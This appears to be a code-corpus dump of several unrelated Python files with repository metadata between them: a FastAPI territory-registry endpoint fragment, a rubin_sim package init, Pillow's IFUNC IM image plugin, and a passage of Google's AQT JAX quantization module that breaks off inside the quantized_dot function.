# input parameters
params: GetKATOTTGListParams = Depends(GetKATOTTGListParams),
# dependencies
session: Session = Depends(db_dependency),
) -> GetKATOTTGListLegacyResponse:
page = get_katottg_list(params=params, session=session)
page_size = len(page.results)
count = page_size + 1 if page.has_next else page_size
base_url = f"{settings.SERVER_ORIGIN}/api/territories"
next_page = f"{base_url}?page={page.page + 1}" if page.has_next else None
previous_page = f"{base_url}?page={page.page - 1}" if page.has_previous else None
return GetKATOTTGListLegacyResponse(
results=page.results,
count=count,
next=next_page,
previous=previous_page,
)
@router.get(
"/territories/{code}",
summary="Отримати дані по КАТОТТГ",
deprecated=True,
tags=[_KATOTTG_TAG],
response_model=KATOTTG,
)
def get_territory_details(code: str, session: Session = Depends(db_dependency)):
return get_katottg_detail(code, session=session)
| 27.167598
| 85
| 0.68394
|
c6a0afe1522df50deaab3d1163084434e16a12b7
| 91
|
py
|
Python
|
rubin_sim/maf/metricBundles/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/maf/metricBundles/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/maf/metricBundles/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
from .metricBundle import *
from .metricBundleGroup import *
from .moMetricBundle import *
| 22.75
| 32
| 0.802198
|
38b3f46f4879ed53cb36ad28b86d9bf221c6e80e
| 10,158
|
py
|
Python
|
Pillow-master/src/PIL/ImImagePlugin.py
|
mingyuyng/DCGAN-tensorflow-master
|
975e968880ceb8b03a9502f75d141ed10532b861
|
[
"MIT"
] | null | null | null |
Pillow-master/src/PIL/ImImagePlugin.py
|
mingyuyng/DCGAN-tensorflow-master
|
975e968880ceb8b03a9502f75d141ed10532b861
|
[
"MIT"
] | null | null | null |
Pillow-master/src/PIL/ImImagePlugin.py
|
mingyuyng/DCGAN-tensorflow-master
|
975e968880ceb8b03a9502f75d141ed10532b861
|
[
"MIT"
] | null | null | null |
#
# The Python Imaging Library.
# $Id$
#
# IFUNC IM file handling for PIL
#
# history:
# 1995-09-01 fl Created.
# 1997-01-03 fl Save palette images
# 1997-01-08 fl Added sequence support
# 1997-01-23 fl Added P and RGB save support
# 1997-05-31 fl Read floating point images
# 1997-06-22 fl Save floating point images
# 1997-08-27 fl Read and save 1-bit images
# 1998-06-25 fl Added support for RGB+LUT images
# 1998-07-02 fl Added support for YCC images
# 1998-07-15 fl Renamed offset attribute to avoid name clash
# 1998-12-29 fl Added I;16 support
# 2001-02-17 fl Use 're' instead of 'regex' (Python 2.1) (0.7)
# 2003-09-26 fl Added LA/PA support
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-2001 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
import re
from . import Image, ImageFile, ImagePalette
from ._binary import i8
__version__ = "0.7"
# --------------------------------------------------------------------
# Standard tags
COMMENT = "Comment"
DATE = "Date"
EQUIPMENT = "Digitalization equipment"
FRAMES = "File size (no of images)"
LUT = "Lut"
NAME = "Name"
SCALE = "Scale (x,y)"
SIZE = "Image size (x*y)"
MODE = "Image type"
TAGS = {COMMENT: 0, DATE: 0, EQUIPMENT: 0, FRAMES: 0, LUT: 0, NAME: 0,
SCALE: 0, SIZE: 0, MODE: 0}
OPEN = {
# ifunc93/p3cfunc formats
"0 1 image": ("1", "1"),
"L 1 image": ("1", "1"),
"Greyscale image": ("L", "L"),
"Grayscale image": ("L", "L"),
"RGB image": ("RGB", "RGB;L"),
"RLB image": ("RGB", "RLB"),
"RYB image": ("RGB", "RLB"),
"B1 image": ("1", "1"),
"B2 image": ("P", "P;2"),
"B4 image": ("P", "P;4"),
"X 24 image": ("RGB", "RGB"),
"L 32 S image": ("I", "I;32"),
"L 32 F image": ("F", "F;32"),
# old p3cfunc formats
"RGB3 image": ("RGB", "RGB;T"),
"RYB3 image": ("RGB", "RYB;T"),
# extensions
"LA image": ("LA", "LA;L"),
"RGBA image": ("RGBA", "RGBA;L"),
"RGBX image": ("RGBX", "RGBX;L"),
"CMYK image": ("CMYK", "CMYK;L"),
"YCC image": ("YCbCr", "YCbCr;L"),
}
# ifunc95 extensions
for i in ["8", "8S", "16", "16S", "32", "32F"]:
OPEN["L %s image" % i] = ("F", "F;%s" % i)
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
for i in ["16", "16L", "16B"]:
OPEN["L %s image" % i] = ("I;%s" % i, "I;%s" % i)
OPEN["L*%s image" % i] = ("I;%s" % i, "I;%s" % i)
for i in ["32S"]:
OPEN["L %s image" % i] = ("I", "I;%s" % i)
OPEN["L*%s image" % i] = ("I", "I;%s" % i)
for i in range(2, 33):
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
# --------------------------------------------------------------------
# Read IM directory
split = re.compile(br"^([A-Za-z][^:]*):[ \t]*(.*)[ \t]*$")
def number(s):
try:
return int(s)
except ValueError:
return float(s)
##
# Image plugin for the IFUNC IM file format.
class ImImageFile(ImageFile.ImageFile):
format = "IM"
format_description = "IFUNC Image Memory"
_close_exclusive_fp_after_loading = False
def _open(self):
# Quick rejection: if there's not an LF among the first
# 100 bytes, this is (probably) not a text header.
if b"\n" not in self.fp.read(100):
raise SyntaxError("not an IM file")
self.fp.seek(0)
n = 0
# Default values
self.info[MODE] = "L"
self.info[SIZE] = (512, 512)
self.info[FRAMES] = 1
self.rawmode = "L"
while True:
s = self.fp.read(1)
# Some versions of IFUNC uses \n\r instead of \r\n...
if s == b"\r":
continue
if not s or s == b'\0' or s == b'\x1A':
break
# FIXME: this may read whole file if not a text file
s = s + self.fp.readline()
if len(s) > 100:
raise SyntaxError("not an IM file")
if s[-2:] == b'\r\n':
s = s[:-2]
elif s[-1:] == b'\n':
s = s[:-1]
try:
m = split.match(s)
except re.error:
raise SyntaxError("not an IM file")
if m:
k, v = m.group(1, 2)
# Don't know if this is the correct encoding,
# but a decent guess (I guess)
k = k.decode('latin-1', 'replace')
v = v.decode('latin-1', 'replace')
# Convert value as appropriate
if k in [FRAMES, SCALE, SIZE]:
v = v.replace("*", ",")
v = tuple(map(number, v.split(",")))
if len(v) == 1:
v = v[0]
elif k == MODE and v in OPEN:
v, self.rawmode = OPEN[v]
# Add to dictionary. Note that COMMENT tags are
# combined into a list of strings.
if k == COMMENT:
if k in self.info:
self.info[k].append(v)
else:
self.info[k] = [v]
else:
self.info[k] = v
if k in TAGS:
n += 1
else:
raise SyntaxError("Syntax error in IM header: " +
s.decode('ascii', 'replace'))
if not n:
raise SyntaxError("Not an IM file")
# Basic attributes
self._size = self.info[SIZE]
self.mode = self.info[MODE]
# Skip forward to start of image data
while s and s[0:1] != b'\x1A':
s = self.fp.read(1)
if not s:
raise SyntaxError("File truncated")
if LUT in self.info:
# convert lookup table to palette or lut attribute
palette = self.fp.read(768)
greyscale = 1 # greyscale palette
linear = 1 # linear greyscale palette
for i in range(256):
if palette[i] == palette[i+256] == palette[i+512]:
if i8(palette[i]) != i:
linear = 0
else:
greyscale = 0
if self.mode == "L" or self.mode == "LA":
if greyscale:
if not linear:
self.lut = [i8(c) for c in palette[:256]]
else:
if self.mode == "L":
self.mode = self.rawmode = "P"
elif self.mode == "LA":
self.mode = self.rawmode = "PA"
self.palette = ImagePalette.raw("RGB;L", palette)
elif self.mode == "RGB":
if not greyscale or not linear:
self.lut = [i8(c) for c in palette]
self.frame = 0
self.__offset = offs = self.fp.tell()
self.__fp = self.fp # FIXME: hack
if self.rawmode[:2] == "F;":
# ifunc95 formats
try:
# use bit decoder (if necessary)
bits = int(self.rawmode[2:])
if bits not in [8, 16, 32]:
self.tile = [("bit", (0, 0)+self.size, offs,
(bits, 8, 3, 0, -1))]
return
except ValueError:
pass
if self.rawmode in ["RGB;T", "RYB;T"]:
# Old LabEye/3PC files. Would be very surprised if anyone
# ever stumbled upon such a file ;-)
size = self.size[0] * self.size[1]
self.tile = [("raw", (0, 0)+self.size, offs, ("G", 0, -1)),
("raw", (0, 0)+self.size, offs+size, ("R", 0, -1)),
("raw", (0, 0)+self.size, offs+2*size, ("B", 0, -1))]
else:
# LabEye/IFUNC files
self.tile = [("raw", (0, 0)+self.size, offs,
(self.rawmode, 0, -1))]
@property
def n_frames(self):
return self.info[FRAMES]
@property
def is_animated(self):
return self.info[FRAMES] > 1
def seek(self, frame):
if not self._seek_check(frame):
return
self.frame = frame
if self.mode == "1":
bits = 1
else:
bits = 8 * len(self.mode)
size = ((self.size[0] * bits + 7) // 8) * self.size[1]
offs = self.__offset + frame * size
self.fp = self.__fp
self.tile = [("raw", (0, 0)+self.size, offs, (self.rawmode, 0, -1))]
def tell(self):
return self.frame
#
# --------------------------------------------------------------------
# Save IM files
SAVE = {
# mode: (im type, raw mode)
"1": ("0 1", "1"),
"L": ("Greyscale", "L"),
"LA": ("LA", "LA;L"),
"P": ("Greyscale", "P"),
"PA": ("LA", "PA;L"),
"I": ("L 32S", "I;32S"),
"I;16": ("L 16", "I;16"),
"I;16L": ("L 16L", "I;16L"),
"I;16B": ("L 16B", "I;16B"),
"F": ("L 32F", "F;32F"),
"RGB": ("RGB", "RGB;L"),
"RGBA": ("RGBA", "RGBA;L"),
"RGBX": ("RGBX", "RGBX;L"),
"CMYK": ("CMYK", "CMYK;L"),
"YCbCr": ("YCC", "YCbCr;L")
}
def _save(im, fp, filename):
try:
image_type, rawmode = SAVE[im.mode]
except KeyError:
raise ValueError("Cannot save %s images as IM" % im.mode)
frames = im.encoderinfo.get("frames", 1)
fp.write(("Image type: %s image\r\n" % image_type).encode('ascii'))
if filename:
fp.write(("Name: %s\r\n" % filename).encode('ascii'))
fp.write(("Image size (x*y): %d*%d\r\n" % im.size).encode('ascii'))
fp.write(("File size (no of images): %d\r\n" % frames).encode('ascii'))
if im.mode == "P":
fp.write(b"Lut: 1\r\n")
fp.write(b"\000" * (511-fp.tell()) + b"\032")
if im.mode == "P":
fp.write(im.im.getpalette("RGB", "RGB;L")) # 768 bytes
ImageFile._save(im, fp, [("raw", (0, 0)+im.size, 0, (rawmode, 0, -1))])
#
# --------------------------------------------------------------------
# Registry
Image.register_open(ImImageFile.format, ImImageFile)
Image.register_save(ImImageFile.format, _save)
Image.register_extension(ImImageFile.format, ".im")
| 29.189655
| 78
| 0.463477
|
2bf05924d9a0a3935d926977a0a443dee44702ba
| 49,564
|
py
|
Python
|
aqt/jax/quantization.py
|
mengdong/google-research
|
7f4622f24125f7e9d6d03662aa0fbeb51bd3374a
|
[
"Apache-2.0"
] | null | null | null |
aqt/jax/quantization.py
|
mengdong/google-research
|
7f4622f24125f7e9d6d03662aa0fbeb51bd3374a
|
[
"Apache-2.0"
] | null | null | null |
aqt/jax/quantization.py
|
mengdong/google-research
|
7f4622f24125f7e9d6d03662aa0fbeb51bd3374a
|
[
"Apache-2.0"
] | 1
|
2021-07-22T18:17:16.000Z
|
2021-07-22T18:17:16.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Abstraction for quantizing neural networks implemented in jax."""
import contextlib
import enum
import functools
import logging
import typing
from typing import Iterable, Optional, Tuple, Union
from absl import flags
import dataclasses
from flax import linen as nn
import jax
from jax import lax
import jax.numpy as jnp
from aqt.jax import compute_cost_utils
from aqt.jax import fp_cast
from aqt.jax import get_bounds
from aqt.jax import primitives
from aqt.jax import shape_utils
from aqt.jax import utils
from aqt.jax.flax import struct as flax_struct
# Global bool to control the use of epsilon in the denominator of the scaling
# methods signed_int_scale and unsigned_int_scale. Epsilon is added to avoid
# division by 0. For testing, one may choose to disable the epsilon by setting
# this global to True.
# As this is a global variable, please modify it only before calling any
# functions that use it.
DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING = False
# Dtype for quantization computations: scaling; floor and clip; rescaling. this
# is chosen to optimize performance for a given hardware i.e. for TPU we set it
# to float32. It should be matching native dtype of the hardware's
# 'vector unit'.
SCALE_DTYPE = jnp.float32
dataclass = flax_struct.dataclass if not typing.TYPE_CHECKING else dataclasses.dataclass
# ActBounds can be an Jax array of floats with a shape that is broadcastable to
# the shape of activation tensors.
ActsBoundT = Union[float, jnp.ndarray, get_bounds.GetBounds.Hyper, None]
@dataclass
class _FloatQuant:
"""Parameters for floating-point quantization.
Floating-point quantization refers to degraded floating-point precision
below those natively supported, e.g., bfloat16. This quantization scheme
can either work with, or without scaling (controlled by `is_scaled`).
With scaling, these quantization steps follow,
1. Use the maximum representable floating-point value to determine a scale.
2. This scale is used to "upscale" the argument to the range of the target
floating-point format.
3. The precision of the argument is then degraded through a downcast
operation.
4. Finally the degraded-precision result is "downscaled" by the inverse
scale.
Without scaling, these quantization steps follow,
1. The argument is downcast to the target fp-format with degraded precision.
Of importance in this downcast is the saturating behavior, which is
logically equivalent to clipping by the maximum representable target
value.
"""
@dataclass
class FloatPrec:
"""Parameters for specifying a custom precision floating-point type."""
# The minimum exponent value of the quantized floating-point format.
exp_min: int
# The maximum exponent value of the quantized floating-point format.
exp_max: int
# The number of significand bits (excluding hidden bit) of the quantized
# floating-point format.
sig_bits: int
# Whether or not floating-point fake-quant makes use of scaling.
is_scaled: bool
# Precision specification for floating-point quantization.
fp_spec: FloatPrec
_PrecT = Union[None, int, _FloatQuant] # pylint: disable=invalid-name
class QuantType(str, enum.Enum):
"""Quantization strategy dataclass."""
# fake_quant strategy ensures that quantized values form an arithmetic
# sequence e.g. 0*s ... 255*s for 8-bit positive quantization, for some s.
# it can be implemented as a local op: upscale, floor, clip, downscale.
fake_quant = 'fake_quant'
# fake_quant strategy with quantized inputs/weights type-casted to int.
fake_quant_with_int = 'fake_quant_with_int'
# aqt ensures that MatMul/Conv are in actual integer domain.
# It can't be implemented as a single op.
# Before matmul we have upscale, floor and clip, and after matmul we have
# downscale.
aqt = 'aqt'
def to_jax_type(self):
"""Returns quantized dtype for the corresponding quantization strategy."""
# Currently, this function is used to decide the return type for
# 'QuantOps.to_quantized.' The AQT implementation works by having a
# conversion to an int dtype and then back to a fp dtype happen *within*
# to_quantized, so that Jax backprop works correctly. Thus
# counter-intuitively, we need this to return a fp dtype for 'aqt' since the
# return type for 'to_quantized' overall is fp. TODO(malmaud): As part of
# the refactor of this module, clean this up to eliminate the
# counter-intuitive behavior.
if self.value in ['aqt', 'fake_quant']: # pylint: disable=comparison-with-callable
return SCALE_DTYPE
elif self.value == 'fake_quant_with_int': # pylint: disable=comparison-with-callable
return jnp.int8
else:
raise RuntimeError(f'QuantType {self.value} is unknown.')
class QuantOps:
"""Class for quantizing and dequantizing weights and activations."""
# Redefined here as nested class attributes to avoid forward-references.
FloatQuant = _FloatQuant # pylint: disable=invalid-name
PrecT = _PrecT # pylint: disable=invalid-name
@dataclass
class WeightParams:
"""Parameters for weight quantization."""
prec: _PrecT # expected precision for weight quantization.
# enable all available values during quantization
half_shift: bool
# Axis along which to quantize weights (the non-feature axis).
axis: Optional[Iterable[int]]
# expected scale shape for weights quantization. Defaults to None.
expected_scale_shape: Union[None, int, Tuple[int, Ellipsis]] = None
@dataclass
class ActHParams:
"""Parameters for activation quantization."""
# Inheriting from 'str' and making the enums have string values lets us
# conveniently serialize this class to JSON without a custom JSON encoder.
class InputDistribution(str, enum.Enum):
symmetric = 'symmetric'
positive = 'positive'
input_distribution: InputDistribution
# float means fixed bound. '-1' means no quantization.
bounds: ActsBoundT
prec: _PrecT
half_shift: bool
def __init__(self, #
*,
prec,
scale, symmetric,
bounds, half_shift):
"""Default constructor, use of named constructors is strongly encoraged.
Args:
prec: precision for the QuantOps
scale: scaling factor to scale the input to quantized precision range
symmetric: whether the input to quantize is symmetric
bounds: Optional. The clipping bounds used for calculating scale factors.
half_shift: Symmetric quantization with all available values enabled
"""
self._prec = prec
self._half_shift = half_shift
if scale is None:
self._scale = None
else:
self._scale = scale.astype(SCALE_DTYPE)
self._symmetric = symmetric
# Storing bounds are useful for two reasons: one is debugging, since it
# makes easy to see how a QuantOps instance came up with its scale factor.
# Two is that right now, we use a bounds of '-1' as a special value meaning
# to 'not quantize'. See comment on the 'should_quantize' method for more
# details.
self._bounds = bounds
@classmethod
def create_symmetric_fp(
cls,
*,
bounds,
fp_quant,
):
"""Create QuantOps for symmetric clipping to floating-point bounds.
Args:
bounds: The upper (and absolute lower) bound to clip the inputs.
fp_quant: quantization floating-point specification of the target format.
Returns:
QuantOps for quantizing/dequantizing signed activations.
"""
if bounds is None:
if fp_quant.is_scaled:
raise ValueError(
'bounds can only be None if fp_quant.is_scaled is False.')
return cls(
prec=fp_quant,
scale=None,
symmetric=True,
bounds=None,
half_shift=False) # disable half_shift for fp quantization
else:
initial_bounds = bounds
# We set bounds = -1 to indicate no quantization.
# TODO(shivaniagrawal): Move away from the hack of setting bound as -1.
bounds = jnp.asarray(bounds, SCALE_DTYPE)
if not DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING:
# to avoid log2(0)
bounds = jnp.abs(bounds) + jnp.finfo(SCALE_DTYPE).eps
scale = jnp.exp2(-jnp.floor(jnp.log2(bounds))) # Scale to unit binade.
# NOTE: stop_gradient is needed here to prevent gradient flow through
# scale when scale is not a constant, but computed as a function of
# activations or weights.
scale = lax.stop_gradient(scale)
return cls(
prec=fp_quant,
scale=scale,
symmetric=True,
bounds=initial_bounds,
half_shift=False) # disable half_shift for fp quantization
@classmethod
def create_symmetric(cls, *, bounds, prec,
half_shift):
"""Create QuantOps for symmetric activations clipped to [-bounds, bounds].
Args:
bounds: The upper (and absolute lower) bound to clip the inputs.
prec: Signed int precision for the QuantOps.
half_shift: Symmetric quantization with all available values enabled
Returns:
QuantOps for quantizing/dequantizing signed activations.
"""
initial_bounds = bounds
bounds = jnp.asarray(bounds, SCALE_DTYPE)
if not DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING:
bounds += jnp.finfo(SCALE_DTYPE).eps # to avoid div by 0
scale = primitives.signed_int_bound(
prec=prec, half_shift=half_shift) / bounds
# NOTE: stop_gradient is needed here to prevent gradient flow through scale
# when scale is not a constant, but computed as a function of activations or
# weights.
scale = lax.stop_gradient(scale)
return cls(
prec=prec,
scale=scale,
symmetric=True,
bounds=initial_bounds,
half_shift=half_shift)
@classmethod
def create_positive(cls, *, bounds,
prec):
"""Create QuantOps for positive activations clipped to [0, bounds].
Args:
bounds: The upper bound to clip the activations.
prec: Unsigned int precision for the QuantOps.
Returns:
QuantOps for quantizing/dequantizing unsigned activations.
"""
initial_bounds = bounds
bounds = jnp.asarray(bounds, SCALE_DTYPE)
if not DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING:
bounds += jnp.finfo(SCALE_DTYPE).eps # to avoid div by 0
scale = primitives.unsigned_int_bound(prec=prec) / bounds
# NOTE: stop_gradient is needed here to prevent gradient flow through scale
# when scale is not a constant, but computed as a function of activations.
scale = lax.stop_gradient(scale)
return cls(
prec=prec,
scale=scale,
symmetric=False,
bounds=initial_bounds,
half_shift=False) # disable half_shift for positive distribution
def assert_scale_shape_is(self, *, shape):
# TODO(shivaniagrawal): add option for float scale for fixed bound acts
# quantization.
assert self._scale.shape == shape, (
'scale shape is unexpected, should be %s but got %s' %
(shape, self._scale.shape))
def to_quantized(self, x, *,
dtype):
"""Quantizes the argument to the target format.
integer: "upscales", rounds or floors and clips.
floating-point: optionally upscales, then downcasts to target precision.
Args:
x: Argument to be quantized.
dtype: Type of returned quantized value of x. If quantized x is an input
to a matmul, we might be want to set it to jnp.int8. If quantized x is
weights stored in memory, same applies. In fake_quant style we might
prefer to set dtype=SCALE_DTYPE, since quantized x might get constant
folded with rescale op (`from_quantized`). Please take a look at the
comment on SCALE_DTYPE.
Returns:
Quantized value of x.
"""
if isinstance(self._prec, _FloatQuant):
if self._prec.is_scaled:
x = jnp.multiply(x, self._scale).astype(x.dtype)
fp_spec = self._prec.fp_spec
return fp_cast.downcast_sat_ftz(
x,
fp_spec.exp_min,
fp_spec.exp_max,
fp_spec.sig_bits,
)
else:
if self._symmetric:
quantize = primitives.round_and_clip_to_signed_int
else:
quantize = primitives.floor_and_clip_to_unsigned_int
scaled_x = jnp.multiply(x, self._scale)
return quantize(
scaled_x, prec=self._prec, dtype=dtype, half_shift=self._half_shift)
# Same as to_quantized but it just "downscales" using the same scale.
def from_quantized(self, x, *,
dtype):
"""'Rescales' the quantized value.
Args:
x: quantized.
dtype: return type for rescaled x
Returns:
Rescaled x cast to type dtype
"""
if (isinstance(self._prec, _FloatQuant) and not self._prec.is_scaled):
return x
rescaled_x = jnp.divide(x, self._scale)
return rescaled_x.astype(dtype)
# Helper fake quantization
def fake_quant(self,
x,
*,
quantized_type,
fake_dependency = None):
x_dtype = x.dtype
quantized_x = self.to_quantized(x, dtype=quantized_type)
if fake_dependency is not None:
quantized_x = lax.tie_in(fake_dependency, quantized_x)
return self.from_quantized(quantized_x, dtype=x_dtype)
# Assumes weights are unsigned int of precision prec.
@classmethod
def create_weights_ops(
cls,
w,
*,
weight_params,
):
"""Create a QuantOps that can quantize and dequantize a weight tensor.
Args:
w: The weights to quantize.
weight_params: WeightParams Parameters required for weight quantization.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
weight_bounds = primitives.max_abs_weights(w, axis=weight_params.axis)
prec = weight_params.prec
half_shift = weight_params.half_shift
if isinstance(prec, _FloatQuant):
ops = cls.create_symmetric_fp(bounds=weight_bounds, fp_quant=prec)
else:
ops = cls.create_symmetric(
bounds=weight_bounds, prec=prec, half_shift=half_shift)
if weight_params.expected_scale_shape is not None:
# NOTE: We set keepdim to True when computing weights scale, as a result
# the axes which are reduced are left in the result as dimensions with
# size one. User should correctly pass the shape with reduced dimensions
# set to 1.
ops.assert_scale_shape_is(shape=weight_params.expected_scale_shape)
return ops
# Assumes weights are unsigned int of precision prec.
@classmethod
def create_weights_fake_quant(
cls,
w,
*,
weight_params,
quantized_type = SCALE_DTYPE,
fake_dependency = None,
):
"""Quantize weights with fake quant approach.
Args:
w: The weights to quantize.
weight_params: WeightParams Parameters required for weight quantization.
quantized_type: type of intermediate quantized value of weights. Defaults
to SCALE_DTYPE.
fake_dependency: dynamic array, quantized weights will have fake
dependency on. lax.tie_in for more details. This is used in order to
prevent constant folding of rescale op with quantized weights. Defaults
to None, in this case quantized weights would not have a fake
dependency.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
if weight_params.prec is None:
return w
ops = cls.create_weights_ops(w, weight_params=weight_params)
return ops.fake_quant(
w, quantized_type=quantized_type, fake_dependency=fake_dependency)
# TODO(malmaud): rename 'input' to activation here and elsewhere in this file.
@classmethod
def create_input_ops(
cls, inputs, *, hparams,
get_bounds_params):
"""Create a QuantOps that can quantize and dequantize an activation tensor.
Args:
inputs: The inputs to quantize.
hparams: Input hyperparameter (ActHParams).
get_bounds_params: GetBoundsParams. Parameters for GetBounds.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
# TODO(shivaniagrawal): investigate why pytype allows types other than
# ActsBoundT.
if isinstance(hparams.bounds, int):
hparams.bounds = float(hparams.bounds)
# NOTE: if flax module name is None, default name is used.
# If we want to train with no quantization at first and then turn on
# GetBounds quantization, we still have to call GetBounds even before
# quantization is enabled since GetBounds calculates and stores the running
# statistics that we will use once quantization is enabled. But before
# quantization is enabled, we want to ignore the returned bounds and just
# return the original unquantized input. To do so, we take advantage of the
# fact that GetBounds returns a constant fixed bound for an initial time
# period and set that initial bound to a special value (-1) to indicate we
# want to store activation statistics without applying quantization. That
# will cause clip_bounds will be a tensor of all '-1', which we will check
# for in a lax.cond call below.
# TODO(malmaud): Refactor code to separate bounds calculation from tracking
# activation statistics to avoid the need to rely on special bounds values
# when disabling quantization.
if isinstance(hparams.bounds, get_bounds.GetBounds.Hyper):
if not get_bounds_params:
raise ValueError(
'act_hparams.bounds is of type GetBounds.Hyper, user must '
'provide get_bounds_params, parameters for GetBounds.')
clip_bounds = get_bounds.GetBounds(
hyper=hparams.bounds, name=get_bounds_params.module_name)(
inputs,
bounds_params=get_bounds_params,
)
elif isinstance(hparams.bounds, (float, jnp.ndarray)):
clip_bounds = hparams.bounds
else:
assert False, (
'%s is not a valid type for hparams.bounds, should be float, a list '
'of floats, or GetBounds.Hyper.' % (type(hparams.bounds)))
if isinstance(hparams.prec, _FloatQuant):
ops = cls.create_symmetric_fp(bounds=clip_bounds, fp_quant=hparams.prec)
elif hparams.input_distribution == cls.ActHParams.InputDistribution.symmetric:
ops = cls.create_symmetric(
bounds=clip_bounds, prec=hparams.prec, half_shift=hparams.half_shift)
elif hparams.input_distribution == cls.ActHParams.InputDistribution.positive:
ops = cls.create_positive(bounds=clip_bounds, prec=hparams.prec)
else:
assert False, "can't happen."
if get_bounds_params and get_bounds_params.expected_bounds_shape is not None:
if isinstance(hparams.bounds, get_bounds.GetBounds.Hyper):
ops.assert_scale_shape_is(shape=get_bounds_params.expected_bounds_shape)
else:
logging.info(
'Ignoring value of argument expected_scale_shape. Scale for fixed '
'bounds would be scalar.')
return ops
@classmethod
def create_inputs_fake_quant(
cls, inputs, *, hparams,
get_bounds_params):
"""Quantize input with fake quant approach.
Args:
inputs: The inputs to quantize.
hparams: Input hyperparameter (ActHParams).
get_bounds_params: GetBoundsParams. Parameters for GetBounds.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
if hparams.bounds is None or hparams.prec is None:
# TODO(lew): support bound-clipping without quantization
return inputs
ops = cls.create_input_ops(
inputs, hparams=hparams, get_bounds_params=get_bounds_params)
quantized_inputs = ops.fake_quant(inputs, quantized_type=SCALE_DTYPE)
return lax.cond(ops.should_quantize(), lambda _: quantized_inputs,
lambda _: inputs, None)
# When using GetBounds quantization (if hparams.bounds is an instance of
# GetBounds.Hyper), if we want to disable quantization but continue to
# collect activation statistics, we have GetBounds return a clip_bounds
# tensor to all '-1' values as a signal that quantization shoulnd't be
# applied. See comment on the call to 'GetBounds' above.
# TODO(malmaud): Find a less hacky way to do this.
def should_quantize(self):
"""Return whether QuantOps should quantize."""
# We return a scalar jnp.ndarray of dtype bool instead of a Python bool
# because during the Jax JIT compilation, self._bounds will be a tracer
# instead of a concrete tensor, which can't be coerced to a Python bool.
# Since the type of jnp.all is an ndarray, we invert it with '~' instead of
# 'not'
return ~jnp.all(self._bounds == -1)
def get_scale_for_aqt(self, *, allow_per_channel_scales):
"""Returns the scale in a shape appropriate for AQT.
An error is raised if the granularity of the scale factors are incompatible
with the current AQT implementation and the setting of
'allow_per_channel_scales'.
Args:
allow_per_channel_scales: A boolean indicating whether a separate scale
factor is allowed for each output channel (True) or if only a scalar
(ie, per-layer) scale factor is allowed (False).
Returns:
Either a scalar array that correspond to a per-layer scale factor, or an
array of shape (1, num_channels) that correspond to per-channel scale
factors.
"""
scale = self._scale
# If 'scale' is a 1x1x...x1 matrix (ie, only has one element), we
# canonicalize it to a scalar to simplify the shape-handling code in the AQT
# implementation.
if scale.size == 1:
return scale.reshape(())
# If the caller requested a a single per-layer scaling factor but the scale
# factor is non-scalar, raise an error.
if not allow_per_channel_scales:
raise ValueError('Scale is not per-layer since it has shape '
f'{scale.shape}.')
# If 'scale' is two-dimensional, then the only allowed shape for 'scale'
# that is currently compatible with AQT is [1, num_channels]. If instead it
# had a shape like [N, 1] or [N, num_channels], that would correspond to
# per-row scale factors, which our AQT implementation does not currently
# handle.
if scale.ndim == 2:
if scale.shape[0] != 1:
raise ValueError(
'Scale has per-row scaling factors, which is not '
f'currently compatible with AQT. Scale has shape {scale.shape}, but '
'a 1 is expected as the shape of the first dimension.')
return scale
else:
raise ValueError(
'Scale has more than two dimensions, which is not '
'currently compatible with AQT. AQT currently only handles multiplying '
f'2D arrays, but has shape {scale.shape}.')
PrecisionType = typing.Any
def quantized_dot(*,
w,
act,
quant_type,
weight_params,
act_hparams,
get_bounds_params,
prefer_int8_to_int32_dot,
dot_precision = None):
"""LAX dot with optionally quantized weights and activations.
Wraps LAX's `Dot
<https://github.com/google/jax/blob/f65a327c764406db45e95048dfe09209d8ef6d37/jax/_src/lax/lax.py#L632`_
operator.
Args:
w: an array representing weights
act: an array representing activations
quant_type: quantization strategy
weight_params: QuantOps.WeighstParams instance for describing weights
quantization.
act_hparams: Optional activation quantization hyperparamers; instance of
QuantOps.ActHParams. None would mean no activation quantization.
get_bounds_params: Optional get bounds params for auto activation
quantization; instance of GetBounds.Params.
prefer_int8_to_int32_dot: Whether to feed lax.dot inputs with an int8
dtype and accumulate to int32 dtype if quantizing to 8bits or 4bits. If
False, inputs are always foating-point.
dot_precision: Optional. Either ``None``, which means the default precision
for the backend, or a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``).
Returns:
An array containing the result with the same dtype as 'w' and 'act'.
Raises:
RuntimeError: 'quant_type' had an unrecognized value.
TypeError: 'act' and 'w' has different input types.
ValueError: Shapes of 'act' and 'w' not compatible with quant_type.
"""
# This code was initially expanded from
# https://github.com/google/jax/blob/f65a327c764406db45e95048dfe09209d8ef6d37/jax/_src/lax/lax.py#L632
# We keep the original return-value semantics of lax.dot, which this wraps. In
# particular, the type of the return value of quantized_dot is the same as the
# type of the inputs. That means that if the inputs are bfloat16, then the
# return type of this function will also be bfloat16 even though on current
# TPUs the underlying bf16*bf16 matrix-multiplication accumulates results to
